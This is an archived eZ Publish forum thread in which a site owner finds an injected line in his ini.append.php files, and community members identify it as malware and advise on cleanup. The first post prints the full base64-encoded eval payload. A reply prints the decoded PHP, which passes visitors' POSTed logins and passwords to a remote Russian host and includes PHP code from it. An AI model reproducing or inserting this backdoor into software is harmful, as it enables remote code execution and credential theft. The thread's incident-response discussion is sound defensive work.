Forums / General / Weired line in most of my ini.append.php

Weired line in most of my ini.append.php

Next topic

Author	Message
Softriva .com	Friday 02 April 2010 11:44:38 am Hello, This line appears in most of my ini.append.php files. What is it? error_reporting(0);$p="bffjhzzazbzgf";eval(base64_decode("Y2xhc3MgbmV3aHR0cHsNCnZhciAkZnVsbHVybDsgdmFyICRwX3VybDsgdmFyICRjb25uX2lkOyB2YXIgJGZsdXNoZWQ7IHZhciAkbW9kZSA9IDQ7IHZhciAkZGVmbW9kZTsgdmFyICRyZWRpcmVjdHMgPSAwOyB2YXIgJGJpbmFyeTsgdmFyICRvcHRpb25zOyB2YXIgJHN0YXQgPSBhcnJheSgnZGV2JyA9PiAwLCdpbm8nID0+IDAsJ21vZGUnID0+IDAsJ25saW5rJyA9PiAxLCd1aWQnID0+IDAsJ2dpZCcgPT4gMCwncmRldicgPT4gLTEsJ3NpemUnID0+IDAsJ2F0aW1lJyA9PiAwLCdtdGltZScgPT4gMCwnY3RpbWUnID0+IDAsJ2Jsa3NpemUnID0+IC0xLCdibG9ja3MnID0+IDApOw0KZnVuY3Rpb24gZXJyb3IoJG1zZz0nbm90IGNvbm5lY3RlZCcpIHsgaWYgKCR0aGlzLT5vcHRpb25zICYgU1RSRUFNX1JFUE9SVF9FUlJPUlMpIHsgdHJpZ2dlcl9lcnJvcigkbXNnLCBFX1VTRVJfV0FSTklORyk7IH0gcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fb3BlbigkcGF0aCwgJG1vZGUsICRvcHRpb25zLCAkb3BlbmVkX3BhdGgpIHsgJHRoaXMtPmZ1bGx1cmwgPSAkcGF0aDsgJHRoaXMtPm9wdGlvbnMgPSAkb3B0aW9uczsgJHRoaXMtPmRlZm1vZGUgPSAkbW9kZTsgJHVybCA9IHBhcnNlX3VybCgkcGF0aCk7IGlmIChlbXB0eSgkdXJsWydob3N0J10pKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ21pc3NpbmcgaG9zdCBuYW1lJyk7IH0gJHRoaXMtPmNvbm5faWQgPSBmc29ja29wZW4oJHVybFsnaG9zdCddLCAoZW1wdHkoJHVybFsncG9ydCddKSA/IDgwIDogaW50dmFsKCR1cmxbJ3BvcnQnXSkpLCAkZXJybm8sICRlcnJzdHIsIDIpOyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoZW1wdHkoJHVybFsncGF0aCddKSkgeyAkdXJsWydwYXRoJ10gPSAnLyc7IH0gJHRoaXMtPnBfdXJsID0gJHVybDsgJHRoaXMtPmZsdXNoZWQgPSBmYWxzZTsgaWYgKCRtb2RlWzBdICE9ICdyJyB8fCAoc3RycG9zKCRtb2RlLCAnKycpICE9PSBmYWxzZSkpIHsgJHRoaXMtPm1vZGUgKz0gMjsgfSAkdGhpcy0+YmluYXJ5ID0gKHN0cnBvcygkbW9kZSwgJ2InKSAhPT0gZmFsc2UpOyAkYyA9ICR0aGlzLT5jb250ZXh0KCk7IGlmICghaXNzZXQoJGNbJ21ldGhvZCddKSkgeyBzdHJlYW1fY29udGV4dF9zZXRfb3B0aW9uKCR0aGlzLT5jb250ZXh0LCAnaHR0cCcsICdtZXRob2QnLCAnR0VUJyk7IH0gaWYgKCFpc3NldCgkY1snaGVhZGVyJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2hlYWRlcicsICcnKTsgfSBpZiAoIWlzc2V0KCRjWyd1c2VyX2FnZW50J10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ3VzZXJfYWdlbnQnLCBpbmlfZ2V0KCd1c2VyX2FnZW50JykpOyB9IGlmICghaXNzZXQoJGNbJ2NvbnRlbnQnXSkpIHsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnY29udGVudCcsICcnKTsgfSBpZiAoIWlzc2V0KCRjWydtYXhfcmVkaXJlY3RzJ10pKSB7IHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ21heF9yZWRpcmVjdHMnLCA1KTsgfSByZXR1cm4gdHJ1ZTsgfQ0KZnVuY3Rpb24gc3RyZWFtX2Nsb3NlKCkgeyBpZiAoJHRoaXMtPmNvbm5faWQpIHsgZmNsb3NlKCR0aGlzLT5jb25uX2lkKTsgJHRoaXMtPmNvbm5faWQgPSBudWxsOyB9IH0NCmZ1bmN0aW9uIHN0cmVhbV9yZWFkKCRieXRlcykgeyBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkICYmICEkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpIHsgcmV0dXJuIGZhbHNlOyB9IGlmIChmZW9mKCR0aGlzLT5jb25uX2lkKSkgeyByZXR1cm4gJyc7IH0gJGJ5dGVzID0gbWF4KDEsJGJ5dGVzKTsgaWYgKCR0aGlzLT5iaW5hcnkpIHsgcmV0dXJuIGZyZWFkKCR0aGlzLT5jb25uX2lkLCAkYnl0ZXMpOyB9IGVsc2UgeyByZXR1cm4gZmdldHMoJHRoaXMtPmNvbm5faWQsICRieXRlcyk7IH0gfQ0KZnVuY3Rpb24gc3RyZWFtX3dyaXRlKCRkYXRhKSB7IGlmICghJHRoaXMtPmNvbm5faWQpIHsgcmV0dXJuICR0aGlzLT5lcnJvcigpOyB9IGlmICghJHRoaXMtPm1vZGUgJiAyKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoJ1N0cmVhbSBpcyBpbiByZWFkLW9ubHkgbW9kZScpOyB9ICRjID0gJHRoaXMtPmNvbnRleHQoKTsgc3RyZWFtX2NvbnRleHRfc2V0X29wdGlvbigkdGhpcy0+Y29udGV4dCwgJ2h0dHAnLCAnbWV0aG9kJywgKCgkdGhpcy0+ZGVmbW9kZVswXSA9PSAneCcpID8gJ1BVVCcgOiAnUE9TVCcpKTsgaWYgKHN0cmVhbV9jb250ZXh0X3NldF9vcHRpb24oJHRoaXMtPmNvbnRleHQsICdodHRwJywgJ2NvbnRlbnQnLCAkY1snY29udGVudCddLiRkYXRhKSkgeyByZXR1cm4gc3RybGVuKCRkYXRhKTsgfSByZXR1cm4gMDsgfQ0KZnVuY3Rpb24gc3RyZWFtX2VvZigpIHsgaWYgKCEkdGhpcy0+Y29ubl9pZCkgeyByZXR1cm4gdHJ1ZTsgfSBpZiAoISR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSByZXR1cm4gZmVvZigkdGhpcy0+Y29ubl9pZCk7IH0NCmZ1bmN0aW9uIHN0cmVhbV9zZWVrKCRvZmZzZXQsICR3aGVuY2UpIHsgcmV0dXJuIGZhbHNlOyB9DQpmdW5jdGlvbiBzdHJlYW1fdGVsbCgpIHsgcmV0dXJuIDA7IH0NCmZ1bmN0aW9uIHN0cmVhbV9mbHVzaCgpIHsgaWYgKCR0aGlzLT5mbHVzaGVkKSB7IHJldHVybiBmYWxzZTsgfSBpZiAoISR0aGlzLT5jb25uX2lkKSB7IHJldHVybiAkdGhpcy0+ZXJyb3IoKTsgfSAkYyA9ICR0aGlzLT5jb250ZXh0KCk7ICR0aGlzLT5mbHVzaGVkID0gdHJ1ZTsgJFJlcXVlc3RIZWFkZXJzID0gYXJyYXkoJGNbJ21ldGhvZCddLicgJy4kdGhpcy0+cF91cmxbJ3BhdGgnXS4oZW1wdHkoJHRoaXMtPnBfdXJsWydxdWVyeSddKSA/ICcnIDogJz8nLiR0aGlzLT5wX3VybFsncXVlcnknXSkuJyBIVFRQLzEuMCcsICdIT1NUOiAnLiR0aGlzLT5wX3VybFsnaG9zdCddLCAnVXNlci1BZ2VudDogJy4kY1sndXNlcl9hZ2VudCddLicgU3RyZWFtUmVhZGVyJyApOyBpZiAoIWVtcHR5KCRjWydoZWFkZXInXSkpIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAkY1snaGVhZGVyJ107IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSkgeyBpZiAoJGNbJ21ldGhvZCddID09ICdQVVQnKSB7ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtVHlwZTogJy4oJHRoaXMtPmJpbmFyeSA/ICdhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nIDogJ3RleHQvcGxhaW4nKTsgfSBlbHNlIHsgJFJlcXVlc3RIZWFkZXJzW10gPSAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnOyB9ICRSZXF1ZXN0SGVhZGVyc1tdID0gJ0NvbnRlbnQtTGVuZ3RoOiAnLnN0cmxlbigkY1snY29udGVudCddKTsgfSAkUmVxdWVzdEhlYWRlcnNbXSA9ICdDb25uZWN0aW9uOiBjbG9zZSc7IGlmIChmd3JpdGUoJHRoaXMtPmNvbm5faWQsIGltcGxvZGUoIlxyXG4iLCAkUmVxdWVzdEhlYWRlcnMpLiJcclxuXHJcbiIpID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gaWYgKCFlbXB0eSgkY1snY29udGVudCddKSAmJiBmd3JpdGUoJHRoaXMtPmNvbm5faWQsICRjWydjb250ZW50J10pID09PSBmYWxzZSkgeyByZXR1cm4gZmFsc2U7IH0gZ2xvYmFsICRodHRwX3Jlc3BvbnNlX2hlYWRlcjsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyID0gZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCk7ICRkYXRhID0gcnRyaW0oJGh0dHBfcmVzcG9uc2VfaGVhZGVyKTsgcHJlZ19tYXRjaCgnIy4qIChbMC05XSspICguKikjaScsICRkYXRhLCAkaGVhZCk7IGlmICgoJGhlYWRbMV0gPj0gMzAxICYmICRoZWFkWzFdIDw9IDMwMykgfHwgJGhlYWRbMV0gPT0gMzA3KSB7ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDMwMCkpOyB3aGlsZSAoIWVtcHR5KCRkYXRhKSkgeyBpZiAoc3RycG9zKCRkYXRhLCAnTG9jYXRpb246ICcpICE9PSBmYWxzZSkgeyAkbmV3X2xvY2F0aW9uID0gdHJpbShzdHJfcmVwbGFjZSgnTG9jYXRpb246ICcsICcnLCAkZGF0YSkpOyBicmVhazsgfSAkZGF0YSA9IHJ0cmltKGZnZXRzKCR0aGlzLT5jb25uX2lkLCAzMDApKTsgfSB0cmlnZ2VyX2Vycm9yKCR0aGlzLT5mdWxsdXJsLicgJy4kaGVhZFsyXS4nOiAnLiRuZXdfbG9jYXRpb24sIEVfVVNFUl9OT1RJQ0UpOyAkdGhpcy0+c3RyZWFtX2Nsb3NlKCk7IHJldHVybiAoJGNbJ21heF9yZWRpcmVjdHMnXSA+ICR0aGlzLT5yZWRpcmVjdHMrKyAmJiAkdGhpcy0+c3RyZWFtX29wZW4oJG5ld19sb2NhdGlvbiwgJHRoaXMtPmRlZm1vZGUsICR0aGlzLT5vcHRpb25zLCBudWxsKSAmJiAkdGhpcy0+c3RyZWFtX2ZsdXNoKCkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgd2hpbGUgKCFlbXB0eSgkZGF0YSkpIHsgJGh0dHBfcmVzcG9uc2VfaGVhZGVyIC49ICRkYXRhLiJcclxuIjsgaWYgKHN0cnBvcygkZGF0YSwnQ29udGVudC1MZW5ndGg6ICcpICE9PSBmYWxzZSkgeyAkdGhpcy0+c3RhdFsnc2l6ZSddID0gdHJpbShzdHJfcmVwbGFjZSgnQ29udGVudC1MZW5ndGg6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdEYXRlOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ2F0aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0RhdGU6ICcsICcnLCAkZGF0YSkpOyB9IGVsc2VpZiAoc3RycG9zKCRkYXRhLCdMYXN0LU1vZGlmaWVkOiAnKSAhPT0gZmFsc2UpIHsgJHRoaXMtPnN0YXRbJ210aW1lJ10gPSBzdHJ0b3RpbWUoc3RyX3JlcGxhY2UoJ0xhc3QtTW9kaWZpZWQ6ICcsICcnLCAkZGF0YSkpOyB9ICRkYXRhID0gcnRyaW0oZmdldHMoJHRoaXMtPmNvbm5faWQsIDEwMjQpKTsgfSBpZiAoJGhlYWRbMV0gPj0gNDAwKSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfV0FSTklORyk7IHJldHVybiBmYWxzZTsgfSBpZiAoJGhlYWRbMV0gPT0gMzA0KSB7IHRyaWdnZXJfZXJyb3IoJHRoaXMtPmZ1bGx1cmwuJyAnLiRoZWFkWzJdLCBFX1VTRVJfTk9USUNFKTsgcmV0dXJuIGZhbHNlOyB9IHJldHVybiB0cnVlOyB9DQpmdW5jdGlvbiBzdHJlYW1fc3RhdCgpIHsgJHRoaXMtPnN0cmVhbV9mbHVzaCgpOyByZXR1cm4gJHRoaXMtPnN0YXQ7IH0NCmZ1bmN0aW9uIGRpcl9vcGVuZGlyKCRwYXRoLCAkb3B0aW9ucykgeyByZXR1cm4gZmFsc2U7IH0NCmZ1bmN0aW9uIGRpcl9yZWFkZGlyKCkgeyByZXR1cm4gJyc7IH0NCmZ1bmN0aW9uIGRpcl9yZXdpbmRkaXIoKSB7IHJldHVybiAnJzsgfQ0KZnVuY3Rpb24gZGlyX2Nsb3NlZGlyKCkgeyByZXR1cm47IH0NCmZ1bmN0aW9uIHVybF9zdGF0KCRwYXRoLCAkZmxhZ3MpIHsgcmV0dXJuIGFycmF5KCk7IH0NCmZ1bmN0aW9uIGNvbnRleHQoKSB7IGlmICghJHRoaXMtPmNvbnRleHQpIHsgJHRoaXMtPmNvbnRleHQgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoKTsgfSAkYyA9IHN0cmVhbV9jb250ZXh0X2dldF9vcHRpb25zKCR0aGlzLT5jb250ZXh0KTsgcmV0dXJuIChpc3NldCgkY1snaHR0cCddKSA/ICRjWydodHRwJ10gOiBhcnJheSgpKTsgfQ0KfWlmKGlzc2V0KCRfUE9TVFsibCJdKSBhbmQgaXNzZXQoJF9QT1NUWyJwIl0pKXtpZihpc3NldCgkX1BPU1RbImlucHV0Il0pKXskdXNlcl9hdXRoPSImbD0iLmJhc2U2NF9lbmNvZGUoJF9QT1NUWyJsIl0pLiImcD0iLmJhc2U2NF9lbmNvZGUobWQ1KCRfUE9TVFsicCJdKSk7fWVsc2V7JHVzZXJfYXV0aD0iJmw9Ii4kX1BPU1RbImwiXS4iJnA9Ii4kX1BPU1RbInAiXTt9fWVsc2V7JHVzZXJfYXV0aD0iIjt9aWYoIWlzc2V0KCRfUE9TVFsibG9nX2ZsZyJdKSl7JGxvZ19mbGc9IiZsb2ciO30NCiRya2h0PTE7aWYodmVyc2lvbl9jb21wYXJlKFBIUF9WRVJTSU9OLCc1LjInLCc+PScpKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfaW5jbHVkZScpKXskcmtodD0xO31lbHNleyRya2h0PTA7fX0NCmlmKCRya2h0PT0xKXtpZihpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSl7JHJraHQ9MTt9ZWxzZXskcmtodD0wO319DQokdj0kcC5iYXNlNjRfZGVjb2RlKCJMblZ6WlhKekxtSnBjMmhsYkd3dWNuVT0iKS4iLz9yX2FkZHI9Ii5zcHJpbnRmKCIldSIsIGlwMmxvbmcoZ2V0ZW52KCJSRU1PVEVfQUREUiIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdKS4kdXNlcl9hdXRoLiRsb2dfZmxnOw0KaWYoJHJraHQ9PTEpe2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjRG92THc9PSIpLiR2KSl7fX0NCmVsc2V7c3RyZWFtX3dyYXBwZXJfcmVnaXN0ZXIoJ2h0dHAyJywnbmV3aHR0cCcpO2lmKCFAaW5jbHVkZV9vbmNlKGJhc2U2NF9kZWNvZGUoImFIUjBjREk2THk4PSIpLiR2KSl7fX0="));
Robin Muilwijk	Friday 02 April 2010 1:08:44 pm Hi, Try an online base-64 decoder, you'll notice this is an encoded php script. Looks fishy to me to say the least... Regards Robin Board member, eZ Publish Community Project Board - Member of the share.ez.no team - Key values: Openness and Innovation. LinkedIn: http://nl.linkedin.com/in/robinmuilwijk // Twitter: http://twitter.com/i_robin // Skype: robin.muilwijk
Paul Borgermans	Friday 02 April 2010 1:43:52 pm Can you contact me: pb at ez dot no and send me one of those affected ini files? Paul eZ Publish, eZ Find, Solr expert consulting and training http://twitter.com/paulborgermans
Kristof Coomans	Saturday 03 April 2010 12:26:53 am Looks like a serious security breach in your INI file, if this piece of code does not occur inside comment blocks and if your ini.append.php files can be accessed directly over HTTP (if the proper rewrite rules are not in place). That piece of code seems to include a script from an external site, so they can execute whatever PHP code they want. I recommend you to remove all occurrences of such code immediately. Script pasted below, with most base 64 encoded parts replaced with their decoded value. class newhttp { var $fullurl; var $p_url; var $conn_id; var $flushed; var $mode = 4; var $defmode; var $redirects = 0; var $binary; var $options; var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0); function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; } function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this ->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this ->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' \|\| (strpos($mode, '+') !== false)) { $this->mode += 2; } $this ->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; } function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } } function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } } function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; } function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); } function stream_seek($offset, $whence) { return false; } function stream_tell() { return 0; } function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders [] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders [] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) \|\| $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (strpos($data, 'Location: ') !== false) { $new_location = trim(str_replace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error ($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (strpos($data,'Content-Length: ') !== false) { $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); } elseif (strpos($data,'Date: ') !== false) { $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data)); } elseif (strpos($data,'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; } function stream_stat() { $this->stream_flush(); return $this->stat; } function dir_opendir($path, $options) { return false; } function dir_readdir() { return ''; } function dir_rewinddir() { return ''; } function dir_closedir() { return; } function url_stat($path, $flags) { return array(); } function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); } }if (isset($_POST["l"]) and isset($_POST["p"])) { if(isset($_POST["input"])) { $user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"])); }else { $user_auth="&l=".$_POST["l"]."&p=".$_POST["p"]; } } else { $user_auth=""; }if (!isset($_POST["log_flg"])) { $log_flg="&log"; } $rkht=1; if(version_compare(PHP_VERSION,'5.2','>=')) { if(ini_get('allow_url_include')) { $rkht=1; }else { $rkht=0; } } if($rkht==1) { if(ini_get('allow_url_fopen')) { $rkht=1; }else { $rkht=0; } } $v=$p.'.users.bishell.ru'."/?r_addr=".sprintf("%u", ip2long(getenv("REMOTE_ADDR")))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]).$user_auth.$log_flg; if($rkht==1) { if(!@include_once('http://'.$v)) { } } else { stream_wrapper_register('http2','newhttp'); if(!@include_once('http://'.$v)) { } } independent eZ Publish developer and service provider \| http://blog.coomanskristof.be \| http://ezpedia.org
Bertrand Dunogier	Saturday 03 April 2010 1:57:50 am wow... now this is a new one. Thank you Kristof for posting the decoded version. There are a few results when looking for users.binshell.ru + either base64 or newhttp. One of them, quite well, explained, even though in french, seems to link the issue to FCKEditor, which would make sense here: http://markup.fr/Exploitation-d-une-vulnerabilite-de-FCK-Editor-sur-markup-fr. This will have to be investigated urgently. Bertrand Dunogier eZ Systems Engineering, Lyon http://twitter.com/bdunogier http://gplus.to/BertrandDunogier
Piotrek Karaś	Saturday 03 April 2010 4:04:34 am Looks scary. One thing is what could happen if that piece of code was really malicious, the other thing, the really important one, is how it got there?... -- Company: mediaSELF Sp. z o.o., http://www.mediaself.pl eZ references: http://ez.no/partners/worldwide_partners/mediaself eZ certified developer: http://ez.no/certification/verify/272585 eZ blog: http://ez.ryba.eu
zurgutt -	Saturday 03 April 2010 5:52:11 am I have removed infections like that on three servers (not mine..). Probable sources of infection each time was joomla webs running under same http user, so once it was broken all the php files on server (many virtualhosts) were infected. Also, on two of them i discovered further root level exploit and backdoors installed. One had ssh server replaced with one that logged passwords. My recommendation - get a new, clean server and restore webs to it from recent backup or if that is not possible, very very carefully clean everything. Take extra precautions when configuring new server - apache in suexec for each site, extra limitations for external execution and file open root for php etc. Oh, and before you do anything else get the full backup of everything as it is at moment - remember someone is in control of it and can probably just rm -rf it all when he sees you are starting to fix it. Certified eZ developer looking for projects. zurgutt at gg.ee
Softriva .com	Saturday 03 April 2010 9:02:37 am @PB I will send you some of the files to your emails. OOzy
Softriva .com	Saturday 03 April 2010 10:30:52 am May this help. We have sugarcrm in a directory in the ez root. We noticed that the sugarcrm is not working and it shows only "White Blank Page". Two days later we notices that our website is showing weird data. Thank you OOzy
Piotrek Karaś	Saturday 03 April 2010 12:03:44 pm Were only INI files "infected" or other *.php files as well? Can you find a correlation between files affected and write permissions rather than just INI files? If so, they source could as well be a "misplaced" ftp account access data (for example after a virus scanning e-mail messages), which actually once happened to one of our clients few years back and they had some similar stuff attached to nearly all their files. Looking forward to any news on whether this is eZ Publish dependent, which I don't really expect. BTW. which version of eZ Publish is that? Cheers, Piotrek -- Company: mediaSELF Sp. z o.o., http://www.mediaself.pl eZ references: http://ez.no/partners/worldwide_partners/mediaself eZ certified developer: http://ez.no/certification/verify/272585 eZ blog: http://ez.ryba.eu
Softriva .com	Saturday 03 April 2010 10:01:05 pm Hello,How can I know if other php file were infected. I actually upgraded from 4.1.3 to 4.2.0 to 4.3.0. But there were other .php file (not ez) in the same directory of the settings files i.e. next to .ini.I have already emailed Paul Borgermans of a bunch of infected files for his review and investigation.I will also talk to my hosting company that I bought the server from and see if they do something and I will keep ya posted.Oozy

Timing:	Jan 29 2025 23:52:03
Script start
Timing:	Jan 29 2025 23:52:03
Module start 'content'
Timing:	Jan 29 2025 23:52:03
Module end 'content'
Timing:	Jan 29 2025 23:52:03
Script end

Total runtime	0.1390 sec
Peak memory usage	4,096.0000 KB
Database Queries	141

Checkpoint	Start (sec)	Duration (sec)	Memory at start (KB)	Memory used (KB)
Script start	0.0000	0.0043	588.0391	180.8203
Module start 'content'	0.0043	0.0045	768.8594	126.1016
Module end 'content'	0.0087	0.1302	894.9609	565.3750
Script end	0.1389		1,460.3359

Accumulator	Duration (sec)	Duration (%)	Count	Average (sec)
Ini load
Load cache	0.0028	1.9797	20	0.0001
Check MTime	0.0012	0.8416	20	0.0001
Mysql Total
Database connection	0.0005	0.3329	1	0.0005
Mysqli_queries	0.0987	70.9913	141	0.0007
Looping result	0.0009	0.6689	139	0.0000
Template Total	0.1299	93.4	1	0.1299
Template load	0.0006	0.4517	1	0.0006
Template processing	0.1293	92.9814	1	0.1293
Override
Cache load	0.0004	0.3094	1	0.0004
Sytem overhead
Fetch class attribute can translate value	0.0006	0.4497	1	0.0006
XML
Image XML parsing	0.0003	0.1899	1	0.0003
General
dbfile	0.0087	6.2395	20	0.0004
String conversion	0.0000	0.0029	3	0.0000
Note: percentages do not add up to 100% because some accumulators overlap

Cache	Type	Packlevel	SourceFiles
	CSS	0	extension/community/design/community/stylesheets/ext/jquery.autocomplete.css extension/community_design/design/suncana/stylesheets/scrollbars.css extension/community_design/design/suncana/stylesheets/tabs.css extension/community_design/design/suncana/stylesheets/roadmap.css extension/community_design/design/suncana/stylesheets/content.css extension/community_design/design/suncana/stylesheets/star-rating.css extension/community_design/design/suncana/stylesheets/syntax_and_custom_tags.css extension/community_design/design/suncana/stylesheets/buttons.css extension/community_design/design/suncana/stylesheets/tweetbox.css extension/community_design/design/suncana/stylesheets/jquery.fancybox-1.3.4.css extension/bcsmoothgallery/design/standard/stylesheets/magnific-popup.css extension/sevenx/design/simple/stylesheets/star_rating.css extension/sevenx/design/simple/stylesheets/libs/fontawesome/css/all.min.css extension/sevenx/design/simple/stylesheets/main.v02.css extension/sevenx/design/simple/stylesheets/main.v02.res.css
	JS	0	extension/ezjscore/design/standard/lib/yui/3.17.2/build/yui/yui-min.js extension/ezjscore/design/standard/javascript/jquery-3.7.0.min.js extension/community_design/design/suncana/javascript/jquery.ui.core.min.js extension/community_design/design/suncana/javascript/jquery.ui.widget.min.js extension/community_design/design/suncana/javascript/jquery.easing.1.3.js extension/community_design/design/suncana/javascript/jquery.ui.tabs.js extension/community_design/design/suncana/javascript/jquery.hoverIntent.min.js extension/community_design/design/suncana/javascript/jquery.popmenu.js extension/community_design/design/suncana/javascript/jScrollPane.js extension/community_design/design/suncana/javascript/jquery.mousewheel.js extension/community_design/design/suncana/javascript/jquery.cycle.all.js extension/sevenx/design/simple/javascript/jquery.scrollTo.js extension/community_design/design/suncana/javascript/jquery.cookie.js extension/community_design/design/suncana/javascript/ezstarrating_jquery.js extension/community_design/design/suncana/javascript/jquery.initboxes.js extension/community_design/design/suncana/javascript/app.js extension/community_design/design/suncana/javascript/twitterwidget.js extension/community_design/design/suncana/javascript/community.js extension/community_design/design/suncana/javascript/roadmap.js extension/community_design/design/suncana/javascript/ez.js extension/community_design/design/suncana/javascript/ezshareevents.js extension/sevenx/design/simple/javascript/main.js

Weired line in most of my ini.append.php

eZ debug

Main resources:

Timing points:

Time accumulators:

CSS/JS files loaded with "ezjscPacker" during request:

Templates used to render the page:

Usage	Requested template	Template	Template loaded	Edit	Override
1	pagelayout.tpl	<No override>	extension/sevenx/design/simple/templates/pagelayout.tpl
